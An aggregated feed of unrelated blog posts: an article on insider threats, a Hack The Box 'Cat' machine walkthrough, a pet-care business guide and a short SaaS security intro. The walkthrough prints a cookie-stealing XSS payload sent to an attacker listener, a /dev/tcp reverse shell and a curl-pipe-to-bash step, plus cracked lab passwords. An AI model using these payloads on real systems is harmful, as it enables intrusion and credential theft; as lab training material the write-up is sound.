According to the Cost of Insider Risks 2025 report, 55% of internal security incidents are caused by employee errors or negligence.[2] What does that mean? You don’t need to plan a cybercrime to compromise a company’s security; sometimes, a single mistaken click is enough.

One of the biggest dangers of insider threats in cybersecurity is how easily they go unnoticed. Since the actors involved often use valid credentials, they don’t immediately raise red flags. How can these attacks be prevented? By strengthening internal policies, training employees, and implementing vulnerability management tools with proactive monitoring to detect suspicious activity from the inside.

Insider Threats in Action: Understanding Internal Risk Profiles

Spotting an insider threat isn’t always as straightforward as identifying an external hacker. Insider threat detection involves recognizing the different profiles that may pose a risk within the organization. From human error to calculated sabotage, understanding insider threat types is key to building an effective defense.

1. Intentional/Malicious Insider

These are deliberate actions carried out by current or former employees who are dissatisfied with the company. Motivated by this discontent, they may steal sensitive data, sabotage systems, or manipulate critical information. In some cases, they even collaborate with external actors.

These insiders are particularly dangerous because their actions are often well-planned and difficult to detect in time. They may wait for the right opportunity to exploit a system vulnerability, use social engineering techniques, or erase logs to avoid being caught.

In 2018, Tesla experienced a well-known malicious insider incident when a former employee was accused of sabotage.[3] According to Elon Musk, the employee stole confidential data and modified the code of the manufacturing operating system.

2. Negligent Insider


This threat stems from mistakes or poor practices rather than malicious intent. Often the result of ignorance or carelessness, common examples include falling for phishing scams, overlooking security protocols, or misconfiguring systems.

In 2017, defense contractor Booz Allen Hamilton exposed over 60,000 sensitive files on an unsecured Amazon Web Services (AWS) server.[4] The data included classified information from the U.S. Army Intelligence and Security Command (INSCOM).

3. Compromised / Third‑Party Insider

This category includes external users such as contractors, vendors, or former employees whose legitimate access has been hijacked. They function as insiders because they operate with valid credentials, making it easier to leak data or spread malware from within. In many cases, compromised insiders result from internal negligence.

In March 2025, Royal Mail suffered a massive data breach after attackers accessed its network through an external vendor, Spectos GmbH.[5] Using stolen credentials, they bypassed internal controls and exfiltrated over 144 GB of customer information, including personal data, internal recordings, and mailing lists.

Accepting that the threat may come from within requires a shift in how we approach security, toward a more human-centric, dynamic, and preventive model. Strengthening cyber resilience means going beyond just identifying threats. It involves rethinking assumptions about who poses a risk and why, and building a truly holistic security culture.

Internal Threat Indicators: Signs Worth Investigating

When someone with insider access launches an attack, they may need to hack internal systems or reconfigure hardware or software infrastructure. Recognizing the signs and tools involved is key to identifying insider risk and responding proactively.

Unusual Login Behavior

Most organizations follow predictable login patterns. Remote access from unusual locations or during off-hours can signal trouble. Authentication logs can also reveal strange username activity, like accounts named "test" or "admin," indicating unauthorized access attempts.
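
A hedged sketch of this kind of check, in Python with a hypothetical auth-event shape (the field names are illustrative, not from any particular SIEM), flags off-hours logins and generic probe account names:

```python
from datetime import datetime

# Generic probe/placeholder account names worth reviewing.
SUSPICIOUS_NAMES = {"test", "admin", "root"}

def flag_login(event: dict, start_hour=8, end_hour=18):
    """Return the reasons an auth-log event deserves review.
    The event shape {'user', 'timestamp'} is hypothetical."""
    reasons = []
    ts = datetime.fromisoformat(event["timestamp"])
    if not (start_hour <= ts.hour < end_hour):
        reasons.append("off-hours login")
    if event["user"].lower() in SUSPICIOUS_NAMES:
        reasons.append("suspicious username")
    return reasons

print(flag_login({"user": "admin", "timestamp": "2025-08-12T03:14:00"}))
# → ['off-hours login', 'suspicious username']
```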

Use of Unauthorized Applications

Critical customer and business management systems, as well as financial platforms, should be tightly controlled. These tools must have clearly defined user roles. Any unauthorized access to these applications, or to the sensitive data they contain, can be devastating to a business.

Privilege Escalation Behavior

People with higher-level system access pose an inherent risk. Sometimes, an administrator may begin granting privileges to unauthorized users, or even to themselves, to gain access to restricted data or apps.

Excessive Data Downloads or Transfers


IT teams must stay alert to their network’s regular bandwidth usage and data transfer patterns. Large, unexplained downloads, especially during odd hours or from unusual locations, may signal an internal threat.

Unauthorized Changes to Firewalls and Antivirus Tools

Any time firewall or antivirus configurations are altered, it could indicate insider tampering. These changes are often subtle attempts to weaken system defenses and create an easy path for future malicious activity.
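
One simple way to catch such tampering is to fingerprint configuration snapshots and compare them against a known-good baseline. A minimal Python sketch (the config text is purely illustrative):

```python
import hashlib

def fingerprint(config_text: str) -> str:
    """SHA-256 fingerprint of a configuration snapshot."""
    return hashlib.sha256(config_text.encode()).hexdigest()

baseline = fingerprint("ACCEPT tcp 443\nDROP all\n")

# Later snapshot: someone has quietly flipped the default policy.
current = fingerprint("ACCEPT tcp 443\nACCEPT all\n")

if current != baseline:
    print("config drift detected - review against change-management records")
```

Any drift surfaces immediately; whether it is a legitimate change or insider tampering is then a question for the change-management trail.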

The Threat Is Internal, but So Is the Opportunity

Insider threats aren’t just technical failures; they reflect human dynamics, outdated processes, and gaps in security infrastructure. Building effective protection demands a proactive, evolving strategy, one that combines robust tools with prepared teams.

At LevelBlue, our simplified approach to cybersecurity with comprehensive managed security services helps organizations identify abnormal patterns, prevent unauthorized access, and respond to insider threats in real time. Our ecosystem of solutions enables continuous, agile defense, turning every threat into an opportunity for long-term improvement.

References
1. DTEX Systems. (2025, Feb 25). Ponemon Cybersecurity Report: Insider Risk Management Enabling Early Breach Detection and Mitigation.
2. DTEX Systems. (2025, Feb 25). Ponemon Cybersecurity Report: Insider Risk Management Enabling Early Breach Detection and Mitigation.
3. Mark Matousek. (2018, June 18). Elon Musk is accusing a Tesla employee of trying to sabotage the company. Business Insider.
4. Patrick Howell O'Neill. (2017, June 1). Booz Allen Hamilton leaves 60,000 unsecured DOD files on AWS server. CyberScoop.
5. Check Red Security. (2025, April 14). When Trusted Access Turns Dangerous: Insider Risks in the Age of Third‑Party Vendors.

Hack The Box: Cat Machine Walkthrough – Medium Difficulty

By: darknite
5 July 2025 at 10:58
Reading Time: 13 minutes

Introduction

This write-up details the “Cat” machine from Hack The Box, a Medium-rated Linux challenge.

Objective on Cat Machine

The goal is to complete the “Cat” machine by accomplishing the following objectives:

User Flag:

To obtain the user flag, an attacker first exploits a Stored Cross-Site Scripting (XSS) vulnerability in the user registration form, which allows stealing the administrator’s session cookie. With this stolen session, the attacker accesses the admin panel and exploits an SQL Injection flaw to extract sensitive user credentials from the database. After cracking these credentials, SSH access is gained as a regular user, enabling the retrieval of the user flag—a secret token proving user-level access.

Root Flag:

For the root flag, privilege escalation is performed by finding a vulnerable image processing script owned by the root user. The attacker crafts a malicious image payload that executes unauthorised commands with root privileges. This leads to obtaining a root shell—the highest level of system access—allowing capture of the root flag, which confirms full control over the machine.

Reconnaissance and Enumeration on Cat Machine

Establishing Connectivity

I connected to the Hack The Box environment via OpenVPN using my credentials, running all commands from a Parrot OS virtual machine. The target IP address for the Cat machine was 10.10.11.53.

Initial Scanning

To identify open ports and services, I ran an Nmap scan:

nmap -sC -sV 10.10.11.53 -oA initial

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/cat]
└──╼ $ nmap -sC -sV -oA initial -Pn 10.10.11.53
# Nmap 7.94SVN scan initiated Tue Jun 17 10:05:26 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.53
Nmap scan report for 10.10.11.53
Host is up (0.017s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 17 10:05:33 2025 -- 1 IP address (1 host up) scanned in 7.38 seconds

Analysis:

  • Port 22 (SSH): OpenSSH 8.2p1 on Ubuntu 4ubuntu0.11 risks remote code execution if unpatched (e.g., CVE-2021-28041).
  • Port 80 (HTTP): Apache 2.4.41, vulnerable to path traversal (CVE-2021-41773), redirects to cat.htb, hinting at virtual host misconfigurations.

Web Enumeration:

Perform directory fuzzing with Gobuster to uncover hidden files and directories and identify any potentially useful resources.

gobuster dir -u http://cat.htb -w /opt/common.txt


Gobuster Output:

Web Path Discovery (Gobuster):

  • /.git Directory: Exposed Git repository risks source code leakage, revealing sensitive data like credentials or application logic.
  • /admin.php, /join.php, and Other Paths: Discovered sensitive endpoints may lack authentication, enabling unauthorised access or privilege escalation.

The website features a typical interface with user registration, login, and image upload functionalities, but the presence of an exposed .git directory and accessible admin endpoints indicate significant security vulnerabilities.

Git Repository Analysis with git-dumper

I used the git-dumper tool to clone the exposed Git repository by executing git-dumper http://cat.htb/.git/ git, then retrieved critical source code files, including join.php, admin.php, and accept_cat.php, for further analysis.

Within the cloned Git repository, several PHP files were identified, meriting further examination for potential vulnerabilities or insights.

Source Code Analysis and Review on Cat Machine

Source Code Review of accept_cat.php

The accept_cat.php file is intended to let the admin user 'axel' accept a cat by inserting its name into the accepted_cats table and deleting the corresponding entry from the cats table. The script correctly verifies the user’s session and restricts actions to POST requests, which is good practice. However, it constructs the insertion SQL query by directly embedding the $cat_name variable without any sanitisation or use of prepared statements:

$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);

This exposes the application to SQL injection attacks, as malicious input in catName could manipulate the query and compromise the database. On the other hand, the deletion query is properly parameterised, reducing risk. To secure the script, the insertion should also use prepared statements with bound parameters. Overall, while session checks and request validation are handled correctly, the insecure insertion query represents a critical vulnerability in accept_cat.php.
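
The fix the review calls for is bound parameters. The application itself is PHP/PDO, where the equivalent is $pdo->prepare() with bound values; the same idea can be demonstrated in a self-contained Python/sqlite3 sketch:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accepted_cats (name TEXT)")

# Hostile input that would break out of a string-concatenated INSERT.
cat_name = "Whiskers'); DROP TABLE accepted_cats;--"

# Parameterized insert: the driver binds the value, so it is never
# parsed as SQL, only stored as data.
conn.execute("INSERT INTO accepted_cats (name) VALUES (?)", (cat_name,))

row = conn.execute("SELECT name FROM accepted_cats").fetchone()
print(row[0])  # the payload is stored as inert text; the table survives
```

The contrast with the vulnerable PHP line above is exactly string interpolation versus placeholder binding.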

Vulnerability Review of admin.php

This admin page lets the user ‘axel’ manage cats by viewing, accepting, or rejecting them. It correctly checks if the user is logged in as ‘axel’ before allowing access and uses prepared statements to fetch cat data from the database safely. The cat details are displayed with proper escaping to prevent cross-site scripting attacks.

However, the page sends AJAX POST requests to accept_cat.php and delete_cat.php without any protection against Cross-Site Request Forgery (CSRF). This means an attacker could potentially trick the admin into performing actions without their consent. Also, based on previous code, the accept_cat.php script inserts data into the database without using prepared statements, which can lead to SQL injection vulnerabilities.

To fix these issues, CSRF tokens should be added to the AJAX requests and verified on the server side. Additionally, all database queries should use prepared statements to ensure user input is handled securely. While the page handles session checks and output escaping well, the missing CSRF protection and insecure database insertion are serious security concerns.

Security Audit of view_cat.php

The view_cat.php script restricts access to the admin user 'axel' and uses prepared statements to safely query the database, preventing SQL injection. However, it outputs dynamic data such as cat_name, photo_path, age, birthdate, weight, username, and created_at directly into the HTML without escaping. This creates a Cross-Site Scripting (XSS) vulnerability because if any of these fields contain malicious code, it will execute in the admin’s browser.

The vulnerable code includes:

Cat Details: <?php echo $cat['cat_name']; ?>
<img src="<?php echo $cat['photo_path']; ?>" alt="<?php echo $cat['cat_name']; ?>" class="cat-photo">
<strong>Name:</strong> <?php echo $cat['cat_name']; ?><br>
<strong>Age:</strong> <?php echo $cat['age']; ?><br>

To mitigate this, all output should be passed through htmlspecialchars() to encode special characters and prevent script execution. Additionally, validating the image src attribute is important to avoid loading unsafe or external resources. Without these measures, the page remains vulnerable to XSS attacks.
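
The effect of htmlspecialchars() can be demonstrated with Python's equivalent, html.escape(), applied to a cookie-stealing payload of the kind this page would otherwise render (illustrative only):

```python
from html import escape

# A typical XSS payload a field like cat_name might carry.
cat_name = '<script>document.location="http://attacker/?c="+document.cookie</script>'

# Escaping encodes the special characters, so the browser renders text
# instead of executing a script.
print(escape(cat_name))
```

After escaping, the angle brackets and quotes become HTML entities, so the markup is displayed rather than interpreted.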

Input Validation Analysis of join.php

The provided PHP code is vulnerable to several security issues, primarily due to improper input handling and weak security practices. Below is an explanation of the key vulnerabilities, followed by the relevant code snippets:

  1. Cross-Site Scripting (XSS): The code outputs $success_message and $error_message without sanitisation, making it susceptible to XSS attacks. User inputs (e.g., $_GET['username'], $_GET['email']) are directly echoed, allowing malicious scripts to be injected.
<?php if ($success_message != ""): ?>
   <div class="message"><?php echo $success_message; ?></div>
   <?php endif; ?>
   <?php if ($error_message != ""): ?>
   <div class="error-message"><?php echo $error_message; ?></div>
   <?php endif; ?>
  2. Insecure Password Storage: Passwords are hashed using MD5 (md5($_GET['password'])), which is cryptographically weak and easily cracked.
$password = md5($_GET['password']);
  3. SQL Injection Risk: While prepared statements are used, the code still processes unsanitized $_GET inputs, which could lead to other injection vulnerabilities if not validated properly.
  4. Insecure Data Transmission: Using $_GET for sensitive data like passwords exposes them in URLs and risks interception.

To mitigate these, use htmlspecialchars() for output, adopt secure hashing (e.g., password_hash()), validate inputs, and use $_POST for sensitive data.

Workflow Evaluation of contest.php

The PHP code for the cat contest registration page has multiple security flaws due to weak input handling and poor security practices. Below are the key vulnerabilities with relevant code snippets:

  • Cross-Site Scripting (XSS): The $success_message and $error_message are output without sanitization, enabling reflected XSS attacks via crafted POST inputs (e.g., cat_name=<script>alert('XSS')</script>).

<?php if ($success_message): ?>
    <div class="message"><?php echo $success_message; ?></div>
<?php endif; ?>
<?php if ($error_message): ?>
    <div class="error-message"><?php echo $error_message; ?></div>
<?php endif; ?>
  • Weak Input Validation: The regex (/[+*{}',;<>()\\[\\]\\/\\:]/) in contains_forbidden_content is too permissive, allowing potential XSS or SQL injection bypasses.
$forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";
  • Insecure File Upload: The file upload trusts getimagesize and uses unsanitized basename($_FILES["cat_photo"]["name"]), risking directory traversal or malicious file uploads.
$target_file = $target_dir . $imageIdentifier . basename($_FILES["cat_photo"]["name"]);

To mitigate, sanitize outputs with htmlspecialchars(), use stricter input validation (e.g., FILTER_SANITIZE_STRING), sanitize file names, restrict upload paths, and validate file contents thoroughly.
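
As an illustration of the file-name mitigations (not the application's code), a Python sketch that strips path components and whitelists characters and extensions:

```python
import os
import re

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

def safe_upload_name(raw_name: str) -> str:
    """Reduce an untrusted upload filename to a safe basename."""
    # Drop any directory components (handles both / and \ separators).
    name = os.path.basename(raw_name.replace("\\", "/"))
    root, ext = os.path.splitext(name)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("disallowed file type")
    # Whitelist characters in the remaining name.
    root = re.sub(r"[^A-Za-z0-9_-]", "_", root)
    return root + ext.lower()

print(safe_upload_name("../../etc/passwd../shell.php.png"))  # → shell_php.png
```

Note that the embedded ".php" is neutralised by the character whitelist, and a bare "payload.php" is rejected outright by the extension check.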

User Registration and Login

Clicking the contest endpoint redirects to the join page, which serves as the registration page.

Let’s create a new account by completing the registration process.

The registration process was completed successfully, confirming that new user accounts can be created without errors or restrictions.

Logging in with the credentials we created was successful.

After a successful login, the contest page is displayed as shown above.

Let’s complete the form and upload a cat photo as required.

Successfully submitted the cat photo for inspection.

Exploiting XSS to Steal Admin Cookie for Cat Machine

Initialise the listener.

Injected a malicious XSS payload into the username field.

Let’s create a new account by injecting malicious XSS code into the Username field while keeping all other inputs valid.
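
The walkthrough does not reproduce the exact payload. A typical stored-XSS cookie grabber placed in the username field looks like the following Python sketch, which only builds the registration data; the attacker URL is a placeholder for the VPN listener, not a value from the box:

```python
# Hypothetical attacker-controlled listener (placeholder VPN IP/port).
ATTACKER = "http://10.10.14.5:8000"

# Classic cookie-exfiltration payload for the vulnerable username field:
# when the admin views the entry unescaped, their browser sends its
# cookies to the listener.
payload = f'<script>document.location="{ATTACKER}/?c="+document.cookie;</script>'

registration = {
    "username": payload,          # rendered unescaped in the admin panel
    "email": "test@cat.htb",
    "password": "Password123!",
}
print(registration["username"])
```

On the attacker side, something as simple as `python3 -m http.server 8000` suffices to receive the cookie in the request log.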

Let’s fill out the form with normal inputs as before.

The process may take anywhere from a few seconds to a few minutes, depending on the response time; it took me several attempts before it worked successfully.

Used Firefox Dev Tools to set the stolen cookie and gain access to admin features.

Once we obtain the token hash, we need to copy and paste it into Firefox’s inspector to proceed further.

After that, simply refresh the page, and you will notice a new “Admin” option has appeared in the menu bar.

Clicking the Admin option in the menu bar redirects us to the page shown above.

Click the accept button to approve the submitted picture.

Leveraging XSS Vulnerability to Retrieve Admin Cookie for Cat Machine

Used Burp Suite to analyze POST requests.

Use Burp Suite to examine network packets for in-depth analysis.

Test the web application to determine if it is vulnerable to SQL injection attacks.

Attempting to inject the SQL command resulted in an “access denied” error, likely due to a modified or invalid cookie.

SQL Injection and Command Execution

After reconstructing the cookie, the SQL injection appears to function as anticipated.

Successfully executed command injection.

We can use the curl command to fetch the malicious file and execute it. The fact that the request hangs is promising, as it indicates the payload is likely executing.
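The delivery chain can be sketched as follows; the attacker IP and port are placeholders, and the injected command assumes the same curl-pipe-to-bash technique described above:

```shell
# Reverse-shell payload; 10.10.14.5 and port 4444 are placeholders.
cat > bash.sh <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
EOF

# In separate terminals: serve the payload and wait for the callback.
#   python3 -m http.server 80
#   nc -lvnp 4444
# The injected command on the target then fetches and executes it:
#   curl http://10.10.14.5/bash.sh | bash
```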

It was observed that bash.sh has been transferred to the victim’s machine.

Success! A shell was obtained as the www-data user.

Database Enumeration

While searching for the database file, we come across an unusual find: cat.db.

Transfer the database file to our local machine.

We discovered that cat.db is a SQLite 3.x database.

sqlite3 cat.db opens the cat.db file using the SQLite command-line tool, allowing you to interact with the database—run queries, view tables, and inspect its contents.

The cat.db database contains three tables: accepted_cats, cats, and users, which likely store approved cat entries, general cat data, and user information, respectively.
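The enumeration can be reproduced with the sqlite3 CLI; the column names below are assumptions based on a typical users table:

```shell
sqlite3 cat.db ".tables"                                  # list the three tables
sqlite3 cat.db "SELECT username, password FROM users;"    # dump the password hashes
```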

Some of the obtained hashes can be cracked immediately.

The screenshot shows the hashes after I rearranged them for clarity.

Breaking Password Security: Hashcat in Action

We need to specify the hash mode, which in this case appears to be MD5.
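A typical invocation, assuming the hashes were saved to hashes.txt and the stock Kali wordlist is available (mode 0 is raw MD5):

```shell
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show   # print cracked pairs

# Sanity check of the format: a raw MD5 digest is always 32 hex characters.
printf '%s' 'soyunaprincesarosa' | md5sum | cut -d' ' -f1
```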

We successfully cracked the hash for the user Rosa, revealing the password: soyunaprincesarosa.

Boom! We successfully gained access using Rosa’s password.

The access.log file reveals the password for Axel.

The user Axel has an active shell account.

The credentials for Axel, including the password, were verified successfully.

Access is achievable via either pwncat-cs or SSH.

Executing the appropriate command retrieves the user flag.
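For example, with Axel's verified credentials; the target IP is a placeholder:

```shell
# Log in as axel with the password recovered from access.log;
# 10.10.11.53 is a placeholder for the target's IP.
ssh -o ConnectTimeout=5 axel@10.10.11.53

# Then, on the box:
#   cat ~/user.txt
```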

Escalate to Root Privileges Access on Cat Machine

Privilege Escalation

The Axel user does not have sudo privileges on the cat system.

Email Analysis

We can read the message sent from Rosa to Axel.

The emails are internal updates from Rosa about two upcoming projects. In the first message, Rosa mentions that the team is working on launching new cat-related web services, including a site focused on cat care. Rosa asks Axel to send details about his Gitea project idea to Jobert, who will evaluate whether it’s worth moving forward with. Rosa also notes that the idea should be clearly explained, as she plans to review the repository herself. In the second email, Rosa shares that they’re building an employee management system. Each department admin will have a defined role, and employees will be able to view their tasks. The system is still being developed and is hosted on their private Gitea platform. Rosa includes a link to the repository and its README file, which has more information and updates. Both emails reflect early planning stages and call for team involvement and feedback.

Checking the machine’s open ports reveals that port 3000 is accessible.

Therefore, we need to set up port forwarding for port 3000.
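Since the service listens only on the target's loopback interface, an SSH local forward makes it reachable from our machine; the IP is again a placeholder:

```shell
# Forward local port 3000 to the target's loopback port 3000
# (-N: no remote command; 10.10.11.53 is a placeholder).
ssh -o ConnectTimeout=5 -N -L 3000:127.0.0.1:3000 axel@10.10.11.53

# The service then answers at http://127.0.0.1:3000 on our machine.
```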

Gitea Exploitation on Cat Machine

The service running on port 3000 is the Gitea web interface.

Using Axel’s credentials, we successfully logged in.

The Gitea service is running version 1.22.0, a version with known vulnerabilities (including a stored XSS issue) that are relevant for further evaluation.

Start the Python server to serve files or host a payload for the next phase of the assessment.

Inject the XSS payload as shown above.

The fake email is sent to the user jobert to test the functionality.

Obtained a base64-encoded cookie ready for decoding.
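Decoding is a one-liner; the value below is illustrative, not the box's actual cookie:

```shell
# Illustrative cookie value; the real one differs but has the same shape.
echo 'eyJ1c2VybmFtZSI6ImFkbWluIn0=' | base64 -d && echo
```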

The decoded cookie appears to contain the username admin.

Edit the file within the Gitea application.

Obtained the token as shown above.

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || 
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}

This PHP script enforces HTTP Basic Authentication by verifying the client's username and password against predefined valid credentials: the username "admin" and the password "IKw75eR0MR7CMIxhH0". Upon receiving a request, the script checks for authentication headers and validates them. If the credentials are missing or incorrect, it responds with a 401 Unauthorized status and prompts the client to authenticate within the "Employee Management" realm.
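The credentials can be tested directly with curl's Basic Auth support; the vhost name here is an assumption, and only the credentials come from the script above:

```shell
# employees.cat.htb is an assumed vhost; credentials come from the PHP source.
curl -s -o /dev/null -w '%{http_code}\n' \
  -u 'admin:IKw75eR0MR7CMIxhH0' http://employees.cat.htb/
```

A 200 status code confirms the credentials are accepted.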

The discovered password also grants root access: it is reused as the administrator password on the machine.

Executing the appropriate command retrieves the root flag.
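A sketch of the final step; su is interactive, so it is shown as the commands you would type from Axel's shell:

```shell
# From axel's shell, the Basic Auth password is reused for root:
#   su -                      # enter IKw75eR0MR7CMIxhH0 at the prompt
#   cat /root/root.txt
# Confirm the escalation worked by checking the effective user:
id
```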

The post Hack The Box: Cat Machine Walkthrough – Medium Difficulty appeared first on Threatninja.net.

Paws for Success: The Pet-Preneur’s Guide to Starting your own Pet Care Business

23 January 2023 at 08:43

Pets are adopted for unconditional love and constant companionship. At the same time, pets need proper care and attention to stay fit. It's the pet owner's responsibility to take care of their pet's food, health, exercise, and other necessities.

However, when owners need to go on a business trip or vacation, they have to board their pets at a kennel. That is not a good alternative, as separation from the home environment makes pets and their owners anxious. Here, pet care businesses come to the rescue: they provide a wide range of services that ensure complete care of the pets.

With the presence of reimbursement policies and increasing pet humanization, the pet care market is growing at scale. According to research, the pet care market is expected to reach $550 billion by 2032, growing at about 7% annually from 2022 to 2032.

The growing volume of the pet care industry creates lucrative business opportunities for those who love pets. Starting a pet care business is a great way to make millions a year from various pet care services. Before we jump in to make the most of these opportunities, take a look at the different services you can consider as your profession.

From Grooming to Boarding: Understanding the Different Pet Care Businesses

pet care business ideas

The pet care industry is divided into various business models that help pet lovers take fur-ever care of their pets. Exploring the different types of pet-friendly businesses can help professionals make inroads into the million-dollar pet care industry. Let's look at some of the notable pet care businesses available:

Pet grooming: Professionals can start grooming boutiques that provide pet grooming services such as facials, massages, pedicures, teeth cleaning, and aromatherapy.

Pet boarding and kennels: Boarding facilities look after pets for the days the owner is out of town. Pets stay in a kennel with a homely feel while interacting with other animals.

Pet Daycare: Get land or a building and allow pet owners to drop their pets off in the morning and pick them up in the evening. Meanwhile, the pets are fed, walked, and given time to play outside.

Pet retail and supplies: Launch a pet retail store where pet owners can buy everything that they need for pet care from food to accessories.

Pet marketplace app: Create a platform such as a mobile app, website, or software system where pet item sellers can register and sell online, enabling pet owners to get everything under one roof.

Pet adoption app: Launch a mobile pet adoption business where prospective owners can browse various breeds and connect with current owners or shelters to adopt a pet.

Dog walking: Start a dog walking business by taking dogs for walks, exercising them, and spending a few hours outside with them in exchange for a few bucks.

Pet sitting: Professionals visit the home and take care of pets when the owner needs to go out. You can carve out a niche within in-home pet care services.

On-demand vet app: Launch an on-demand vet business app that helps pet owners easily connect with veterinarians so that they can get immediate medical help.

Pet food delivery app: Get into the pet food delivery business wherein pet food retailers supply pet food to the doorstep of the pet owners.

Pet wearable app: Pet owners can identify their pet’s location in real-time with a wearable device attached to the pet that helps them track every movement anytime, anywhere.

Pet training & counseling: You can start providing counseling services to the owner to better take care of their pet and train the pets at home or other places.

Pet matchmaking app: Help pet lovers find the best pet for their needs, such as a family pet, safety pet, or companion pet, by building a pet matchmaking app. The app can also match two pets with each other.

Pet exercise tracker app: Enable pet owners to keep an eye on their pet’s exercise and other activities right on their mobile with pet exercise tracker app development.

Dog park locator app: Allow pet owners to easily find out the nearby park where they can take their dog for a small walk or fun through the dog park locator app.

From Dream to Reality: Starting Your Own Pet Care Business

How to Start Pet Care Business

Starting a pet care business involves more than registering with the state government. Here's a step-by-step guide to beginning and launching a successful pet care business:

Business plan

First, map out the business specifics with a well-defined strategy, risk identification, and discovery of unknown factors. The business plan defines the business description, such as the types of pets to take care of, the accommodation facilities to arrange, and the business niche, like pet daycare or pet grooming.

After summarizing the business description, figure out the cost of starting the pet care business, followed by ongoing expenses. After calculating the cost, work out how to make money and set prices for your services to keep the business profitable.

Don't forget to select a business name and get it registered. Before registration, research the name on social media channels, federal and state trademark records, and state business records. A detailed business plan will help you achieve a good return on investment sooner.

Financing option

Starting a pet care business can be inexpensive or costly, depending on the niche. If your pockets are not deep and you need finances to start, look for funding options such as crowdfunding or angel investment.

With financial statement analysis and profit-and-loss estimation, create a financial plan to determine how much funding you need. Thereafter, you can connect with investors to fund your pet care business, or apply for loans or mortgages to secure the necessary funds.

Licensing and regulations

Some locations require pet care businesses to hold permits and licenses to operate. Check with your local authorities about the licenses and permits you must obtain. A sales tax license or permit is also required to sell any kind of pet care products and services. The Small Business Administration can help you understand which license you need.

Check the regulations for providing pet care services in a home or on leased/rented property. State laws restrict the number of pets cared for at one time. Signing a service agreement that details the services, pricing, visits, and payment options is also important.

Equipment and supplies

Some pet care services require modern equipment and supplies. For instance, to provide pet grooming services you need animal clippers, pet shampoo, pet healthcare products, pet soap, clothing, toothbrushes, and more. In the same vein, bathing stations, grooming tables, and grooming shears are needed as equipment.

Identify your business niche and then research the equipment setup and supplies required to deliver the best pet care services.

The Ultimate Checklist for Managing a Pet Care Business

How to manage a pet care business

After starting your pet care business, you need to manage it well to ensure it runs smoothly. Here are the ways to take care of your pet care business:

Staffing and training

Some pet services require professionals to obtain certification and training so that they can deliver better care. Ensure your pet care providers have a certain level of expertise and skill, such as handling pets' behavioral or dietary issues, so pet owners feel their pet is in safe hands.

For instance, hiring trained dog walkers guarantees they can handle various types of dogs properly because they know the precautions to take when handling and treating pets.

Bookkeeping and accounting

To legitimately run a pet services business, you are liable for various responsibilities, such as bookkeeping, accounting, and taxes. The owner should create a business account for transactions that is kept separate from the personal account. Use accounting software for expense and revenue tracking and link it to the business account. Later, account reconciliation is important to ensure no record duplication, which is a great help during an audit.

Insurance liability

Having insurance is a must in pet care services, as you are working with living animals. Liability insurance helps protect employees, property, and other people. Property insurance is a must when you provide services outside the home, such as dog walking. Employees should also be covered by workers' compensation insurance.

Customer service and satisfaction

A user-centric business needs quality service delivery to keep pet owners happy and satisfied. That requires hiring pet-friendly employees, setting fair service prices, and building a pet care software application that attracts customers and keeps them coming back. Treat this as an opportunity to consistently deliver the best customer experience and leave a lasting positive impression.

Marketing and advertising

Moving ahead according to the business plan, everything is now ready. It's high time to spread the word about the pet care services you offer to pet parents. Here are a couple of ways to market and promote your pet care business uniquely.

Harness social power: Create business pages on social media platforms such as Instagram, Facebook, LinkedIn, and Twitter, or list your business on the classified or business listing directories such as Yelp, Foursquare, Thumbtack, Angi, and Craigslist. Post pictures and reviews of customers regularly to get more popular.

Loyalty program: Provide incentives to the existing customers or reward them for showing their patronage of the business. You can also reward them for bringing in new clients.

Furry Ventures!

If you have an entrepreneurial mindset and find spending time with pets relaxing, the pet care business is a great fit for you. With pet owners increasingly preferring professional pet care providers, the opportunities are immense. Be compassionate and provide quality care to launch your pet care startup like a pro.

This step-by-step process for starting a pet care business, along with the management tips above, will help you launch and grow the business. Choose your niche and start right away!

The post Paws for Success: The Pet-Preneur’s Guide to Starting your own Pet Care Business appeared first on TopDevelopers.co.

Strengthen Your SaaS Security with SaaS Ops

29 September 2022 at 05:45

What exactly is SaaS Security?

Many organizations have multi-cloud setups, with the average corporation employing services from at least five cloud providers. Cloud computing is popular, but it brings security hazards such as compatibility problems, contract breaches, unsecured APIs, and misconfigurations.

SaaS configurations are an attractive target for cybercriminals because they store a large amount of sensitive data, such as payment card details and personal information. Consequently, enterprises need to emphasize the importance of SaaS security. 

SaaS security includes the techniques companies use to secure their assets while employing SaaS architecture. According to the UK's National Cyber Security Centre (NCSC) guidance on SaaS security, the client and the service provider or software distributor must share security responsibilities. Moreover, service providers offer SaaS Security Posture Management (SSPM) solutions that automate and manage SaaS security.

